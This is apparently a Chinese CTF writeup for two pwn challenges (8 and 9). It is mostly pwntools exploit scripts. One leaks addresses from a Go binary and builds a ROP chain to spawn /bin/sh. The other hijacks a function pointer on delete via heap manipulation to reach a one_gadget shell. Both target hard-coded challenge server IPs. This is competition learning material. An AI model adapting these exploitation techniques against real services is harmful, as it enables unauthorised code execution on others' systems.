[原创]第8 第9题Writeup (队友代发)
2019-3-25 23:38 5014
8. 挖宝
Pwn
Go 1.6 Binary
Treasure4 会往真正的栈上写
预测 Treasure4 的位置,然后 ROP
# Challenge 8 writeup script (Go 1.6 binary, pwn): Python 2 + pwntools
# (print statement, str payloads). The page posted the script collapsed
# onto a single line; the line breaks and indentation below are
# reconstructed from statement order and may not match the author's file.
from pwn import *
from time import sleep
from ctypes import CDLL
import sys,os
context.arch = "amd64"
elf = ELF("./trepwn")
libc = ELF("./trelibc.so")
host = "211.159.175.39"
port = 8787
# name_ptr, ret1, padding, elf, CDLL, sys and os are never referenced
# again in the script as posted.
name_ptr= 0x489410
ret1 = 0xC820047CE0
padding = 'A'*0x30
cc = False
# Stage counter that pwn() branches on (1..5); each completed stage
# increments it by one.
endtime = 1
# Filled in by pwn() stages 1-4 from the 8 bytes echoed after 'message: '.
stackaddr =0
baseaddr = 0
libcaddr = 0
cacheaddr = 0
#io = process("./trepwn",env = {'LD_PRELOAD':'./trelibc.so'})
io = remote(host,port)
def mov(d):
    # Send one movement character after the ")>>" prompt; the short sleep
    # paces the interaction with the remote service.
    sleep(0.1)
    io.sendlineafter(")>>",d)
def msg(data):
    # Send a message line after the ">> " prompt.
    io.sendlineafter(">> ",data)
def pwn():
    # Runs exactly one stage per call, selected by the global endtime.
    # Stages 1-4 each send a fixed-layout line, read 8 bytes after
    # 'message: ', unpack them into a global and advance endtime.
    # Stage 5 builds the ROP chain and hands the connection to the user.
    global endtime
    global stackaddr
    global baseaddr
    global libcaddr
    global cacheaddr
    if endtime ==1:
        # Stage 1: the line ends in a single byte '\xf8'; the echoed value
        # is kept as stackaddr.
        io.sendline('a'*(6*8)+p64(1)*2+'a'*(8*16)+'\xf8')#+p64(0XC820064250)+p64(0x200)+p64(0x200))
        io.recvuntil('message: ')
        addr = u64(io.recv(8))
        print hex(addr)
        stackaddr = addr
        endtime += 1
        return
    if endtime ==2:
        # Stage 2: sends stackaddr+0x60; the echoed value is rebased by a
        # hard-coded delta (taken from a local run) and page-aligned.
        io.sendline('a'*(6*8)+p64(1)*2+'a'*(8*16)+p64(stackaddr+0x60))
        io.recvuntil('message: ')
        addr = u64(io.recv(8))
        print hex(addr)
        baseaddr = (addr-(0x55ff03397ee9-0x55ff032c0000 ))&0xfffffffffffff000
        info("base:0x%x",baseaddr)
        endtime +=1
        return
    if endtime ==3:
        # Stage 3: sends baseaddr+0x474ef0; the echoed value minus another
        # hard-coded delta becomes libcaddr.
        io.sendline('a'*(6*8)+p64(1)*2+'a'*(8*16)+p64(baseaddr+0x474ef0))
        io.recvuntil('message: ')
        addr = u64(io.recv(8))
        print hex(addr)
        libcaddr =addr -( 0x7f75ffa89950-0x7f75ff9f2000 )
        #io.interactive()
        info("libc:0x%x",libcaddr)
        endtime +=1
        return
    if endtime ==4:
        # Stage 4: same shape as stage 1 with a trailing '\x18'; the
        # echoed value is kept as cacheaddr.
        io.sendline('a'*(6*8)+p64(1)*2+'a'*(8*16)+'\x18')#+p64(0XC820064250)+p64(0x200)+p64(0x200))
        io.recvuntil('message: ')
        addr = u64(io.recv(8))
        print hex(addr)
        cacheaddr = addr
        endtime += 1
        #io.interactive()
        return
    #io.interactive()
    if endtime ==5:
        #raw_input()
        # Stage 5: syscall and add_rsp are offsets; the chain is the
        # rebased syscall gadget, add_rsp, syscall number 59, the address
        # of "/bin/sh" located in the libc image, then three zero words.
        syscall = 0x186600
        add_rsp = 0xd72f4
        rop = p64(baseaddr+syscall)
        rop += p64(add_rsp)
        rop += p64(59)
        rop += p64(libcaddr+next(libc.search("/bin/sh"),))
        rop += p64(0)*3
        io.sendline('a'*(6*8)+p64(1)*2+'a'*(8*16)+p64(stackaddr-0xf8+0x38)+p64(0x30)*2+p64(0)*3+p64(1)+p64(0xcb4)+p64(cacheaddr)+p64(0x1)+p64(0x0)*2+rop)
        endtime+=1
        io.interactive()
    io.interactive()
#raw_input()
name = 'AAAA'
io.sendlineafter("Please input you name :\n",name)
#rand = callrand()
# Walk to the first three treasures: five steps in one direction, then a
# 16-byte message at the ">> " prompt.
for i in range(5):
    mov('d')
#rand = callrand()
msg('1'*0x10)
info("Treasure 1 found")
for i in range(5):
    mov('w')
#rand = callrand()
msg('2'*0x10)
info("Treasure 2 found")
for i in range(5):
    mov('a')
#rand = callrand()
msg('3'*0x10)
info("Treasure 3 found")
mov('s');mov('d')
# Direction order used by loop() when searching for the fourth treasure.
des = 'dsaw'
def mov_brute(d):
    # Move without pacing and peek at 0x13 bytes of the reply; "Cong" in
    # it means the fourth treasure was hit, so the next pwn() stage runs.
    io.sendlineafter(")>>",d)
    if "Cong" in io.recv(0x13):
        # NOTE: no `global cc` declaration, so this binds a local only;
        # the module-level cc stays False (it is never read anyway).
        cc = True
        info("Treasure 4 found")
        pwn()
def loop():
    # One sweep: three steps in each direction of des.
    sleep(0.1)
    for de in des:
        for i in range(3):
            mov_brute(de)
cnt = 0
# Sweep indefinitely; pwn() advances one stage each time a sweep hits the
# treasure, and stage 5 ends in io.interactive(). Every 20 sweeps four
# bytes are read and logged as a progress indicator.
while True:
    loop()
    cnt=cnt+1
    if(cnt%20==0):
        cod = io.recv(4)
        info("loop %d cod %s"%(cnt,cod))
9. C与C++
Pwn
delete 的时候会调用一个函数指针,利用这个性质来实现任意地址执行
from pwn import * #p = process('./candcpp') p=remote('154.8.222.144', 9999) p.recvuntil('name') p.sendline(p64(0x400e10)+p64(0x4009a0)) def c_malloc(l,s): p.recvuntil('>>') p.sendline('1') p.recvuntil('string') p.sendline(str(l)) p.recvuntil('string') p.send(s) def c_free(idx): p.recvuntil('>>') p.sendline('2') p.recvuntil('string') p.sendline(str(idx)) def cpp_new(l,s): p.recvuntil('>>') p.sendline('3') p.recvuntil('string') p.sendline(str(l)) p.recvuntil('string') p.send(s) def cpp_dele(idx): p.recvuntil('>>') p.sendline('4') p.recvuntil('string') p.sendline(str(idx)) #c_malloc(0x2e,p64(0x401228)+p64(0)[:-1]+p64(0x401228)+p64(0)[:-1]+p64(0x401228)+'\n') #c_malloc(0x2e,p64(0x401228)+p64(0)[:-1]+p64(0x401228)+p64(0)[:-1]+p64(0x401228)+'\n') #c_malloc(0x2e,p64(0x401228)+p64(0)[:-1]+p64(0x401228)+p64(0)[:-1]+p64(0x401228)+'\n') c_malloc(0xe,(p64(0x401228)+p64(0x401228)[:-1])+'\n') c_malloc(0xe,(p64(0x401228)+p64(0x401228)[:-1])+'\n') c_malloc(0xe,(p64(0x401228)+p64(0x401228)[:-1])+'\n') #cpp_new(0x20,'AAAAA\n') #cpp_new(0x20,'BBBBB\n') c_malloc(0x100,(p64(0x401228)+p64(0x401228)[:-1])*18+'\n') #cpp_new(0x100,'BBBBB\n') c_malloc(0x100,(p64(0x602328+8)+p64(0x602328+8)[:-1])*9+(p64(0x602328)+p64(0x602328)[:-1])*6+'\n') c_free(2) c_free(1) c_free(0) #cpp_new(46,(p64(0x4008b0)+p64(0x4008b0)[:-1])*5+p64(0x4008b0)+'\n') #cpp_new(0x8,'aaa\n') #c_malloc(0x2e,(p64(0x401228)+p64(0)[:-1])*3+p64(3)+p64(0x4008b0)+'\n') #cpp_dele(0) c_malloc(0xe,(p64(0x401228)+p64(0x401228)[:-1])*15+'\n') c_free(0) c_malloc(0xe,(p64(0x401228)+p64(0x401228)[:-1])*15+'\n') cpp_dele(0) p.recvuntil('0x') addr = int(p.recvuntil('\n')[:-1],16) libc_base = addr - (0x7f1a7c683690-0x7f1a7c614000) one = libc_base +0xf02a4 info("libc:0x%x",libc_base) p.recvuntil('name') p.sendline(p64(one)) c_free(4) c_malloc(0x100,(p64(0x602328+8)+p64(0x602328+8)[:-1])*9+(p64(0x602328)+p64(0x602328)[:-1])*6+'\n') cpp_dele(0) p.interactive()